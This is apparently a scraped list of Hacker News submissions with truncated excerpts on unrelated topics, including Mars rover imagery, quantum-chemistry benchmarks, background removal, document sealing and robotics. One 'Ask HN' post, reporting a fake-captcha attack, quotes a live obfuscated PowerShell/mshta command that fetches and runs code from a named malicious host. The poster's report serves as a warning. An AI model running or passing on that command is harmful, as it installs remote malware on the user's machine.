NASA’s Curiosity Mars Rover Discovers Field of Honeycomb Textureshttps://www.nasa.gov/missions/mars-science-laboratory/curiosity-rover/nasas-curiosity-mars-rover-discovers-field-of-honeycomb-textures/As NASA’s Curiosity rover recently began climbing up a Martian valley nicknamed “Valle Grande,” it sent back images that were a familiar sight to mission scientists: honeycomb-like textures called polygonal fractures, each one about 1.5 to 3 inches (4 to 8 centimeters) across. The mission has spotted small patches of these geometric shapes several times […]

Spin audit of SQD/QSCI quantum-chemistry benchmarks on iron–sulfur clustershttps://zenodo.org/records/21359923Author here. Background, for anyone who hasn't followed this fight: IBM's iron–sulfur SQD results (Sci. Adv. 2025) are one of the flagship "quantum computers are useful for chemistry now" claims, and a published critique (arXiv:2501.07231) argues the quantum samples never beat classical selected-CI at matched cost. That argument is still live. Both sides have been arguing about energies. Neither measured which electronic state these calculations actually converge to.So I measured it. ⟨S²⟩ comes out between 4.7 and 7.0 depending on the system and the subspace size, where the target these papers name is a singlet at ⟨S²⟩ = 0. Every starting guess I tried lands in the same place, and the error at convergence is about the size of the spin-state ladder itself, which is the physics under dispute.IBM ships a mitigation for this. Run exactly as shipped, using their driver, their recovery loop and their own spin_square() diagnostic, it moves the ground energy by under a nanohartree while making t

Ask HN: Crooked Timber showed showed me a virus captcha, What now?https://news.ycombinator.com/item?id=49084404Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background. It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press RunAt first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine.I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and

Show HN: FeyNoBg – Automatic background removal model and training libraryhttps://usefeyn.com/blog/feynobg/Hey HN, I’m Shreyash from Feyn. We help companies build custom models from their data.Today, we’re releasing FeyNoBg, an automatic background removal model. Alongside it, we're open-sourcing NoBg, the Python library we built to train and run it.Try the model here: https://huggingface.co/spaces/feyninc/feynobg. Check out the library here: https://github.com/feyninc/nobgSome sample outputs:(1) Soccer Freekick: https://drive.google.com/file/d/1MZkAGLwbhNVOZ0Oi7XvpCfSEu9Q...(2) Hair in wind: https://drive.google.com/file/d/1Odc2m0XMVH9uZtvI_KjaRbXzhLL...(3) Bicycle with visible spokes: https://drive.google.com/file/d/1h99ahjfrtS1MFQJJgiKE2fuM3HZ...(4) Live Demo video: https://youtu.be/b1heHPvY8BMBackground removal separates an image's subject from its surrounding. We've all tried it at some point. Often it is to reuse the subject in a different artifact. Nowadays, it is common to make chat stickers out of it. It is one of the most common but under-appreciated uses of AI. It is also surpris

Show HN: Let's Seal – Let's Encrypt for document signing, free and self-hostedhttps://github.com/letsseal/letssealTLDR, Let's Seal gives the finger to Adobe and every doc signing tool (docusign, google, etc) who pay to play with the Adobe Approved Trust List and then charge you for something that should be free.Currently even the person checking if a document/contract is sealed or code is authentic has to also be inside the same Adobe walled garden too. Verification, the part that should be free is the part everyone charges for. Thats the shape Let's Encrypt fixed for TLS, and I wanted the same thing for documents and files. The core idea therefore needed to go a bit beyond e signatures and i created an open standard (SEAL), plus free tools that implement it.When you seal a file, three independent things happen.1. it gets a signature from a certificate authority, chaining to a public root. 2. its record is appended to an RFC 6962 transparency log. and 3. its SHA256 is timestamped on a public blockchain (Bitcoin) via OpenTimestamps. Those three give you integrity, transparency and a timestamped proo

Ask HN: 1950's Chip industry undermined unions how is AI not doing the same?https://news.ycombinator.com/item?id=49064165In the 1950s the Chip industry undermined minorities, immigrants, women and killed unions. In the 1960-70s it targeted black civil rights groups.Along the way, white men were pushed into management, while anything outside of business was split into smaller tasked jobs. This in return gave companies leverage to cut salaries.I don't care what altman says chatgpt did in a blackbox. I judge the world by what I see. Reality is, chat, claude, etc etc are about as useful as smart as the stupidest, slowest engineer on the team.On the other hand, introducing them has made the job appear more "streamline" more production line like. Work increased, and salaries flattened. Now that companies are not getting returns off of AI, they are cutting AI spending, but make no mistake. Salaries will not recover. What am I missing? How am I wrong?Would love opinions on this

We need to rethink tech stackhttps://news.ycombinator.com/item?id=49061251Let me start this with something we already know, AI is here, it may be controversial how it will operate open or closed but its not going anywhere. If you look at the current tech space, AI integrations and use and some very useful but some unnecessary AI implementations, you will realise that there are either many gaps in current understanding.Lets start on what i wanted to talk, first lets talk about AI, what is AI, not the defination, but actually is AI, it may not be the ultimate intelligence but have some intelligence or atleast we can say, it know certain well known patterns, its ability comes in various sizes, but essentially now we a black box with some knobs, which be a better solution than hard coded flows, logics and if its imagined well, it can be really really useful but there is a flaw.We being extremists, we either think of its going to taking all the jobs or its just useless, there is another way to approach it.Think of it as intelligence layer available to you, but cur

Show HN: LLM-spend – Audit your OpenAI/Anthropic API spend locallyhttps://github.com/kliukovkin/llm-spendI build spend-pacing systems for ad auctions for a living, and my side-project agent workloads still kept surprising me with API bills I couldn't explain. When I asked around how people attribute LLM spend, the answers were the provider dashboard or a spreadsheet.llm-spend is a local CLI that pulls usage from the OpenAI/Anthropic reporting APIs, breaks spend down by key, model and project, projects end-of-month, and flags days that look abnormal against the same weekday's history. It also does a second, independent read of the provider's cost API and warns if the totals disagree by more than 1%. That check exists because I don't want to ship you a wrong report: it catches unit, pagination and grouping bugs in my own pipeline. It checks against the provider's cost API, not your invoice — credits, tax and non-API charges live elsewhere.Keys are the ugly part. OpenAI admin keys can be scoped down to read-only usage/cost access, but admin keys require a Team plan. Anthropic admin keys can'

Robotics development made dead simple (open source)https://news.ycombinator.com/item?id=49058956Hey everyone,My team and I have been working hard on this project: https://peppy.botIt's a direct replacement for ROS 2. We already have the OpenArm robot (https://openarm.dev) working on the platform, both v1.0 and v2.0, plus Isaac Sim and MuJoCo integration. If you're in a hurry, head over to https://docs.peppy.bot/quickstart/ and get started in 5min.Our long term vision is to allow anyone (even non-devs) to go from a prompt to real humanoid robot actions, first in simulation, then on the physical robot.Happy to answer any question.
